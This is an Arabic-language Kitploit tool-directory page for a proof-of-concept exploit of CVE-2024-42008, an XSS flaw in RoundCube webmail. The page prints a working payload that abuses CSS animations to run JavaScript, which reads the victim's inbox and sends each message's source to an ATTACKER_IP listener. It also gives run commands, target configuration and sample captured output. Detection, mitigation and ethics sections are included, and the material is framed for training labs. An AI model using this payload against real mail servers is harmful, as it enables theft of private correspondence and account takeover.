Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Roundcube-CVE-2024-42008-POC | Kitploit
أدوات/GitHubGitHub/rpgsec/roundcube-cve-2024-42008-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالتصيد الاحتياليCTFالتعلم والتعليم
GitHubrpgsec/roundcube-cve-2024-42008-poc

Roundcube-CVE-2024-42008-POC

عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال CVE-2024-42008 ثغرة XSS في RoundCube

نظرة عامة

يحتوي هذا المستودع على برهان مفهوم لاستغلال CVE-2024-42008، وهي ثغرة Cross-Site Scripting (XSS) في تطبيق البريد الإلكتروني RoundCube. صُمم هذا الاستغلال للأغراض التعليمية وبيئات اختبار الاختراق الخاضعة للرقابة مثل HackTheBox.

تفاصيل الثغرة

ملخص CVE-2024-42008

  • معرّف CVE: CVE-2024-42008
  • النوع: Cross-Site Scripting (XSS)
  • درجة CVSS: عالية
  • الإصدارات المتأثرة:
    • RoundCube ≤ 1.5.7
    • RoundCube 1.6.x ≤ 1.6.7
  • الإصدارات المُصلحة: 1.5.8, 1.6.8+

التفاصيل التقنية

توجد الثغرة في rcmail_action_mail_get->run() وتسمح للمهاجمين عن بُعد بتنفيذ JavaScript تعسفي في متصفحات الضحايا. ينبع الخلل من عدم كفاية التحقق من المدخلات عند معالجة محتوى البريد الإلكتروني، خاصة في التعامل مع حركات CSS وسياقات تنفيذ JavaScript.

ناقل الهجوم الرئيسي:

  • محتوى HTML خبيث يُحقن عبر نماذج الاتصال أو رسائل البريد الإلكتروني
  • خصائص حركات CSS تُستخدم لتفعيل تنفيذ JavaScript
  • معالجات أحداث onanimationstart تتجاوز عوامل تصفية المحتوى
  • تُنفَّذ حمولة JavaScript في سياق تطبيق البريد الإلكتروني

الأثر

الاستغلال الناجح يتيح للمهاجمين:

  • سرقة رسائل الضحية من صندوق الوارد والمجلدات الأخرى
  • استخراج البيانات الوصفية للرسائل (UIDs، قوائم الرسائل)
  • الوصول إلى الكود المصدري للرسائل والمرفقات
  • إرسال رسائل بريد إلكتروني من حساب الضحية
  • حصاد بيانات اعتماد تسجيل الدخول ورموز الجلسات
  • تنفيذ إجراءات نيابةً عن الضحية

تحليل سكربت الاستغلال

بنية السكربت

يتكون الاستغلال من ثلاثة مكونات رئيسية:

  1. توصيل حمولة XSS: إرسال HTML خبيث عبر نموذج الاتصال
  2. خادم HTTP: الاستماع للبيانات المستخرجة
  3. معالجة البيانات: التقاط وتسجيل رسائل البريد المسروقة

تفصيل الحمولة

root@kitploit:~
// The core XSS payload uses CSS animations to trigger JavaScript
<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=
  // 1. Fetch email list from victim's INBOX
  fetch('/?_task=mail&_action=list&_mbox=INBOX&_page=&_remote=1')
  .then(r=>r.text())
  .then(t=>{
    // 2. Extract email UIDs using regex
    [...t.matchAll(/this\\.add_message_row\\((\\d+),/g)].forEach(m=>{
      // 3. For each email, fetch full source
      fetch(`/?_task=mail&_uid=${m[1]}&_mbox=INBOX&_action=viewsource`)
      .then(r=>r.text())
      .then(data=>{
        // 4. Exfiltrate email data to attacker server
        fetch(`http://ATTACKER_IP:PORT/?data=${encodeURIComponent(data)}`)
      })
    })
  })
; foo=bar">

الميزات الرئيسية

  • تشغيل مستمر: يمكن إرسال الحمولات على فترات منتظمة
  • وضع التخفي: بصمة دنيا ومعالجة أخطاء
  • تسجيل البيانات: التقاط وتخزين تلقائي لرسائل البريد المستخرجة
  • وضع التصحيح: دعم وكيل لتحليل حركة المرور
  • قابل للتكوين: خيارات متعددة لسطر الأوامر

الاستخدام

المتطلبات الأساسية

root@kitploit:~
pip install requests

الاستخدام الأساسي

root@kitploit:~
# Single payload delivery
python cve-2024-42008-exploit.py

# Continuous mode (every 30 seconds)
python cve-2024-42008-exploit.py -c

# Custom interval (every 60 seconds)
python cve-2024-42008-exploit.py -c -i 60

# Debug mode with proxy
python cve-2024-42008-exploit.py -d

التكوين

عدّل السكربت لتكوين:

  • ATTACKER_IP: عنوان IP لخادم الاستماع لديك
  • ATTACKER_PORT: المنفذ لاستقبال البيانات المستخرجة
  • RECIPIENT_EMAIL: عنوان البريد الإلكتروني المستهدف
  • TARGET_URL: مثيل RoundCube المعرّض للخطر
  • PROXY: خادم وكيل لتصحيح الأخطاء (Burp Suite/Caido)

خيارات سطر الأوامر

الخيارالوصف
-d, --debugتفعيل وضع التصحيح مع دعم الوكيل
-c, --continuousإرسال الحمولات بشكل مستمر
-i, --intervalالفاصل الزمني بين الحمولات (الافتراضي: 30 ثانية)

تسلسل الهجوم

  1. حقن الحمولة: يرسل السكربت HTML خبيثًا عبر نموذج الاتصال
  2. توصيل البريد: يعالج RoundCube المعرّض للخطر البريد ويوصله
  3. تفاعل الضحية: يفتح/يعرض المستخدم البريد الإلكتروني الخبيث
  4. تنفيذ XSS: حركة CSS تُفعّل حمولة JavaScript
  5. استخراج البيانات: تسرق JavaScript رسائل البريد وترسلها إلى المهاجم
  6. التقاط البيانات: يستقبل خادم الاستغلال البيانات المسروقة ويسجلها

الاكتشاف والتخفيف

للمدافعين

مؤشرات الاكتشاف:

  • خصائص حركات CSS غير معتادة في محتوى البريد الإلكتروني
  • معالجات أحداث onanimationstart في HTML
  • JavaScript مشبوه في رسائل البريد الإلكتروني
  • طلبات صادرة إلى نطاقات غير معروفة من تطبيق البريد
  • إرسالات متكررة لنماذج الاتصال

استراتيجيات التخفيف:

  • تحديث RoundCube إلى الإصدار 1.5.8 أو 1.6.8+
  • تنفيذ سياسة أمان المحتوى (CSP)
  • تفعيل تصفية محتوى البريد الإلكتروني
  • مراقبة حركة المرور الصادرة المشبوهة
  • تدقيق أمني منتظم لإعدادات تطبيق البريد

لاختباري الاختراق

اعتبارات الاختبار:

  • تأكد من الحصول على التفويض المناسب قبل الاختبار
  • وثّق جميع الأنشطة لأغراض التقارير
  • اختبر في بيئات معزولة فقط
  • تحقق من أن الهدف معرّض للخطر عمدًا
  • اتبع ممارسات الكشف المسؤول

الاعتبارات القانونية والأخلاقية

⚠️ تحذير: هذا الاستغلال مُقدَّم للأغراض التعليمية والاختبارات المصرَّح بها فقط.

  • استخدمه فقط على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها
  • مصمم لـ HackTheBox والمنصات التعليمية المشابهة
  • الاستخدام غير المصرح به قد يخالف القوانين المحلية والدولية
  • اتبع دائمًا ممارسات الكشف المسؤول
  • احترم لوائح الخصوصية وحماية البيانات

المراجع التقنية

  • الإدخال الرسمي لـ CVE-2024-42008
  • النشرة الأمنية لـ RoundCube
  • CWE-79: البرمجة النصية عبر المواقع

مثال على المخرجات

root@kitploit:~
[+] Listening on 10.10.14.209:8001 for exfiltrated data...
[2024-07-09 10:30:15] POST Request Sent! Status Code: 200

[+] 📩 Captured Email Data:
Return-Path: <[email protected]>
Received: from localhost (localhost [127.0.0.1])
...
[Email content]
--------------------------------------------------
[+] 🔥 Email data saved to emails.log

إخلاء المسؤولية

هذا الكود مُقدَّم للأغراض التعليمية واختبار الاختراق المصرح به فقط. المؤلفون غير مسؤولين عن أي إساءة استخدام أو ضرر ناتج عن هذا البرنامج. تأكد دائمًا من حصولك على التفويض المناسب قبل اختبار أي نظام.

تنزيل الأداة